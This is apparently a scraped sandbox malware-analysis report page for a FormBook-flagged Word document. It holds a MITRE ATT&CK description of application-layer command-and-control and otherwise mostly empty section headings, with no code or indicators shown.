Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RFL_PO 69002.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "RFL_PO 69002.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 993

General

VBA Code Keywords

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1786